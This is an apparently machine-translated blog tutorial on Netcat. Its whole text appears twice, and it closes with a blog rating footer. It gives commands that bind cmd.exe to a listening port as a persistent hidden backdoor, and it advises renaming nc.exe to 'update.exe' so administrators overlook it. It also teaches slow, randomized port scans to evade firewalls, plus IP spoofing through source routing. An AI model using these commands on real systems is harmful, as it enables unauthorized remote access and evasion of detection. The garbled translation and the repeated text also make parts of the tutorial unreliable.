Tutorial Netcat for newbies
TUTORIAL NETCAT FOR NEWBIES
In summary, Netcat makes and accepts TCP connections AND UDP. That is all! Netcat writes and reads data on this type of connections until they are closed. Provides a subsystem for connection to a basic network based on TCP/UDP allows users to interact in a normal way or via script with network applications and services on the application layer. Allow us to see data TCP and UDP raw before they are coated by the next higher layer, such as FTP, SMTP, or HTTP. Before you continue I must tell you that you'll need to have Netcat in C:WINDOWSSystem32 by issues that I am not primordial of this manual.
COMMAND LINE
The basic line of command for Netcat is nc [options] host ports, where host is the IP address that you want to scan and ports is either a specific port or a range of ports, or a range of ports separated by spaces. Let's take a look at each of the options.
-d Enables nc to work in a quiet way and it disengages from the command prompt MS-DOS.
-e <command> A nc to listen you can run the <command> in the moment that someone connects to the port on which it is listening.
-i <seconds> wait Interval, which is the amount of time that nc will wait between two deliveries of successive data.
-g <list-of-path> You can specify up to 8 options –g in the command line to force your traffic nc to pass through certain IP addresses.
-G <pointer jumps> This option allows you to define which IP address is going to be the next hop within the path with the –g option.
-l Active mode listens nc.
-L Active mode listens to nc but with more interest.
-n Indicates to the nc that do not do any query of host names.
-or <archivohex> Performs a hex dump of the data and stores it in a hex file.
-p <port> allows You to specify the local port that you will use nc.
-r Nc chooses randomly the local ports and remote.
-s Specifies the source IP address that you need to use nc when to make their connections.
-t Is able to handle option negotiation Telnet.
-u Indicates to the nc that use UDP instead of TCP.
-v Reports the state of nc, if you put another –v you can get more information.
-w <seconds> Controls how long you are going to wait for nc before you terminate a connection.
-z tells nc that you send the amount of data necessary to know on which ports it is listening to something.
GET REMOTE ACCESS TO A SHELL
If you run the command nc.exe -l –p4455 –e cmd.exedesde a command prompt window on a platform based on Windows NT or Windows 2000, anyone who makes a Telnet to port 4455 on that platform you will find a shell TWO without having to log in to it.
Quite elegant, but also a little scary. Almost without effort we just get a command prompt on the attacked system. Naturally, in the systems Windows NT and Windows 2000, you will have the same privileges and services that the user running Netcat. If we create in this way a back door in Windows 95 and Windows 98obtendremos a complete control.
We will continue to deepen in this command, remember that by default, Netcat will run in the DOS window that is logged on, this fact means that the window control commands will have to stay open while Netcat is running. We will use the –d option from the command prompt.
Code:
C:>nc.exe –l –p 4455 –d –e cmd.exe
In this way, we will be able to hide a back door based on Netcat.
However, if someone does a Telnet to port 4455 and is connected, as soon as you finish the connection, Netcat will think that your work has finished and will no longer listen to. To avoid this we use the –L option is telling Netcat to listen with more interest even after you have completed the connection.
Code:
C:>nc.exe –p 4455 –d –L –e cmd.exe
This will allow us to return to the system until the administrator of the system to discover the back door. And to avoid that we discover we can change the name of nc.exe for any other thing. Note: in this example I have nc.exe I'm going to move on C: and not in C:WindowsSystem32
Anyone will be able to ignore something as seemingly harmless as update.exe. Another feature of Netcat is that if we use it without any option on the command line, we prompt you to enter in the first line of the standard input.
EXPLORATION SILENT OF PORTS
As Netcat can talk to a range of ports, used in a very obvious would be to use it as a browser of ports. The –z option is the answer. This option tells Netcat which sends a given amount of data to any port, but such amount shall only be sufficient to know if the port is open or not. In this case we will use the option –v or –vv for without at least a –v we will not be able to see the result of the exploration. Here I am doing a scan of ports on 127.0.0.1 from 139 to 145. I got as a result that are only open to 139,141 and 142.
But this way of doing it is not the most correct for us to say because some firewall applications will block certain IP address if they receive too many connections on it in a very short period of time. For that not to happen this Netcat allows you to do scans of a way more discreet, so discreet that not seem to be an exploration of ports. You can use the –i option and set up a test interval and the –r option to do it randomly.Can be done this same procedure for the UDP ports just by adding –u to the command line.
TO SPOOF AN IP ADDRESS
Impersonate an IP address is simple. Firewalls that perform masking, or a translation of the network addresses impersonating to daily IP addresses. These devices take a packet from an internal IP address, change the source IP address of the packet to its own IP address, sent over the network and undo the changes when they return to receive data from the destination. For this reason, we say that modifying the contents of the source IP address in an IP packet is simple. What is difficult is to be able to receive data from an IP address spoofed.
Netcat has the option –s which will allow us to specify the IP address that you want. Anyone could start an exploration of ports using the –s option to make you think that you are being explored by Microsoft or the FBI. However, the problem comes to us when we want to forward the answers provided by the port supplanted our real IP address. Suppose, for example, that the target host thinks it received a connection request from Microsoft, will try to send a message of recognition to that Microsoft ip. Naturally, this IP address will have no idea what he is talking about the destination host and send a reset. How can we send the information back to the actual IP address, without our being discovered?
Instead of attacking the machine destination, the only other viable option is to use the routing source-dependent. The routing source-dependent allows a network application to specify the path you want to follow to get to your destination.
There are two types of routing source-dependent: strict and relaxed. The routing source-dependent strict means that the package must specify each hop in the route to reach the destination host. Some routers and other network devices to continue to allow the routing source-dependent strict, but very few allow the routing source-dependent relaxed. The routing source-dependent relaxed indicates to the routers and network devices that routers can perform most of the routing to reach the destination host, this process will allow us to make the package pass through our machine to the back. Using this method, the routing source-dependent may allow suplantemos an IP address and that we obtain the answers to your return trip. Most of the routers are unaware of the options of the routing source-dependent, but not all.
The –g option Netcat will allow us to specify up to 8 jumps which must give the package before you get to your destination, for example: nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 10.10.9.50 23 will come in contact with the telnet port in 10.10.9.50, but if the options in the routing-dependent source are activated on routers in between, traffic will be forced to follow the path through these 4 locations before reaching its destination. If you try nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 –G 12 10.10.9.50 23, in this command we are specifying a pointer jump using the –G. The –G option will set the pointer jump to the n-simo byte (in this case twelfth), and because IP addresses are 4 bytes long, the pointer jump will begin in 10.10.7.4. So on your way to 10.10.9.50, the traffic will need to traverse only the last two machines (because according to the pointer jump as we have been in the first). However on the trip back the package if it goes through the 4 machines.
In summary, Netcat makes and accepts TCP connections AND UDP. That is all! Netcat writes and reads data on this type of connections until they are closed. Provides a subsystem for connection to a basic network based on TCP/UDP allows users to interact in a normal way or via script with network applications and services on the application layer. Allow us to see data TCP and UDP raw before they are coated by the next higher layer, such as FTP, SMTP, or HTTP. Before you continue I must tell you that you'll need to have Netcat in C:WINDOWSSystem32 by issues that I am not primordial of this manual.
COMMAND LINE
The basic line of command for Netcat is nc [options] host ports, where host is the IP address that you want to scan and ports is either a specific port or a range of ports, or a range of ports separated by spaces. Let's take a look at each of the options.
-d Enables nc to work in a quiet way and it disengages from the command prompt MS-DOS.
-e <command> A nc to listen you can run the <command> in the moment that someone connects to the port on which it is listening.
-i <seconds> wait Interval, which is the amount of time that nc will wait between two deliveries of successive data.
-g <list-of-path> You can specify up to 8 options –g in the command line to force your traffic nc to pass through certain IP addresses.
-G <pointer jumps> This option allows you to define which IP address is going to be the next hop within the path with the –g option.
-l Active mode listens nc.
-L Active mode listens to nc but with more interest.
-n Indicates to the nc that do not do any query of host names.
-or <archivohex> Performs a hex dump of the data and stores it in a hex file.
-p <port> allows You to specify the local port that you will use nc.
-r Nc chooses randomly the local ports and remote.
-s Specifies the source IP address that you need to use nc when to make their connections.
-t Is able to handle option negotiation Telnet.
-u Indicates to the nc that use UDP instead of TCP.
-v Reports the state of nc, if you put another –v you can get more information.
-w <seconds> Controls how long you are going to wait for nc before you terminate a connection.
-z tells nc that you send the amount of data necessary to know on which ports it is listening to something.
GET REMOTE ACCESS TO A SHELL
If you run the command nc.exe -l –p4455 –e cmd.exedesde a command prompt window on a platform based on Windows NT or Windows 2000, anyone who makes a Telnet to port 4455 on that platform you will find a shell TWO without having to log in to it.
Quite elegant, but also a little scary. Almost without effort we just get a command prompt on the attacked system. Naturally, in the systems Windows NT and Windows 2000, you will have the same privileges and services that the user running Netcat. If we create in this way a back door in Windows 95 and Windows 98obtendremos a complete control.
We will continue to deepen in this command, remember that by default, Netcat will run in the DOS window that is logged on, this fact means that the window control commands will have to stay open while Netcat is running. We will use the –d option from the command prompt.
Code:
C:>nc.exe –l –p 4455 –d –e cmd.exe
In this way, we will be able to hide a back door based on Netcat.
However, if someone does a Telnet to port 4455 and is connected, as soon as you finish the connection, Netcat will think that your work has finished and will no longer listen to. To avoid this we use the –L option is telling Netcat to listen with more interest even after you have completed the connection.
Code:
C:>nc.exe –p 4455 –d –L –e cmd.exe
This will allow us to return to the system until the administrator of the system to discover the back door. And to avoid that we discover we can change the name of nc.exe for any other thing. Note: in this example I have nc.exe I'm going to move on C: and not in C:WindowsSystem32
Anyone will be able to ignore something as seemingly harmless as update.exe. Another feature of Netcat is that if we use it without any option on the command line, we prompt you to enter in the first line of the standard input.
EXPLORATION SILENT OF PORTS
As Netcat can talk to a range of ports, used in a very obvious would be to use it as a browser of ports. The –z option is the answer. This option tells Netcat which sends a given amount of data to any port, but such amount shall only be sufficient to know if the port is open or not. In this case we will use the option –v or –vv for without at least a –v we will not be able to see the result of the exploration. Here I am doing a scan of ports on 127.0.0.1 from 139 to 145. I got as a result that are only open to 139,141 and 142.
But this way of doing it is not the most correct for us to say because some firewall applications will block certain IP address if they receive too many connections on it in a very short period of time. For that not to happen this Netcat allows you to do scans of a way more discreet, so discreet that not seem to be an exploration of ports. You can use the –i option and set up a test interval and the –r option to do it randomly.Can be done this same procedure for the UDP ports just by adding –u to the command line.
TO SPOOF AN IP ADDRESS
Impersonate an IP address is simple. Firewalls that perform masking, or a translation of the network addresses impersonating to daily IP addresses. These devices take a packet from an internal IP address, change the source IP address of the packet to its own IP address, sent over the network and undo the changes when they return to receive data from the destination. For this reason, we say that modifying the contents of the source IP address in an IP packet is simple. What is difficult is to be able to receive data from an IP address spoofed.
Netcat has the option –s which will allow us to specify the IP address that you want. Anyone could start an exploration of ports using the –s option to make you think that you are being explored by Microsoft or the FBI. However, the problem comes to us when we want to forward the answers provided by the port supplanted our real IP address. Suppose, for example, that the target host thinks it received a connection request from Microsoft, will try to send a message of recognition to that Microsoft ip. Naturally, this IP address will have no idea what he is talking about the destination host and send a reset. How can we send the information back to the actual IP address, without our being discovered?
Instead of attacking the machine destination, the only other viable option is to use the routing source-dependent. The routing source-dependent allows a network application to specify the path you want to follow to get to your destination.
There are two types of routing source-dependent: strict and relaxed. The routing source-dependent strict means that the package must specify each hop in the route to reach the destination host. Some routers and other network devices to continue to allow the routing source-dependent strict, but very few allow the routing source-dependent relaxed. The routing source-dependent relaxed indicates to the routers and network devices that routers can perform most of the routing to reach the destination host, this process will allow us to make the package pass through our machine to the back. Using this method, the routing source-dependent may allow suplantemos an IP address and that we obtain the answers to your return trip. Most of the routers are unaware of the options of the routing source-dependent, but not all.
The –g option Netcat will allow us to specify up to 8 jumps which must give the package before you get to your destination, for example: nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 10.10.9.50 23 will come in contact with the telnet port in 10.10.9.50, but if the options in the routing-dependent source are activated on routers in between, traffic will be forced to follow the path through these 4 locations before reaching its destination. If you try nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 –G 12 10.10.9.50 23, in this command we are specifying a pointer jump using the –G. The –G option will set the pointer jump to the n-simo byte (in this case twelfth), and because IP addresses are 4 bytes long, the pointer jump will begin in 10.10.7.4. So on your way to 10.10.9.50, the traffic will need to traverse only the last two machines (because according to the pointer jump as we have been in the first). However on the trip back the package if it goes through the 4 machines.
Tutorial Netcat for newbies
![]()
Reviewed by Unknown
on
2:33:00 AM
Rating: